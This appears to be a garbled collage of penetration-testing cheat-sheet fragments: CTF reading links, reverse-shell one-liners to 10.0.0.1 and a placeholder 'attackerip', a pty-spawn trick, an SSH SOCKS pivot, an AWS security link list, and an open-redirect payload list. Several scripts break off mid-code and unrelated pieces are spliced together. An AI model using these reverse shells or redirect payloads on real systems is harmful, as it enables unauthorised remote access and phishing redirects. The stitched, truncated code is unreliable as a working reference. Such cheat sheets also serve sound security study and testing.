- Eindbazen "cone" writeup
- Rolf Rolles's z3-based solution to some math problem
- SMT Solvers for Software Security
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
'''
Author : Cyber Security IPB
Date : October 28, 2016
Dependencies : pwntools
This script can replace function calls in an ELF binary
(32 / 64 bit). For example, changing "call printf" to "call puts"
to patch a format string vulnerability. Or changing a function call
in the program to a different function.
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
    td = dt - epoch
    return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6
from concurrent.futures import ThreadPoolExecutor
from requests_futures.sessions import FuturesSession
def outp(response):
    print(response)
    print(response.headers)
    print(response.text)
urls = [
    "https://www.google.com",
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
    DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
104.16.119.221 boards.4chan.org
104.16.59.249 i.4cdn.org
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com